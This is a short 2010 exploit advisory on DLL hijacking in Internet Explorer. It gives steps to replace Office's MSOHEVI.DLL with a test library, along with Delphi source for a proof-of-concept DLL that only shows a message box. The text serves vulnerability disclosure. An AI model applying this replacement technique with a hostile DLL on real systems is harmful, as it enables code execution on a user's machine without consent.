|
Exploit Title : [Internet Explorer Dll Hijacking Exploit] Date : [08 Sept 2010] Author : [STRELiTZIA] Software : [INTERNET EXPLORER] Tested on : [Windows Xp SP3 + Office 2007] ============================ = Description = ============================ Internet Explorer laod %drive%:\%Program Files%\Microsoft Office\Office12\MSOHEVI.DLL library without checks, or any visual warning messages related to library modifications. Vulnerability that can allow attackers to execute malicious code locally, without user consent, in the privilege context of the targeted application. ============================ = Instructions = ============================ 1- Copy "Test.dll" into "%drive%:\%Program Files%\Microsoft Office\Office12\" 2- Rename "MSOHEVI.DLL" to "MSOHEVI.DLL_Original". 3- Rename "Test.dll" to "MSOHEVI.DLL". ============================ = Tests = ============================ - Launch Internet Explorer.
============================ = Test Dll Source "Delphi" = ============================ Library Test; uses Windows;
begin MessageBoxA ( 0, PChar('Yep, I''m running in your system without your permission.'), PChar('Sample'), MB_ICONSTOP ); end.
|
|
|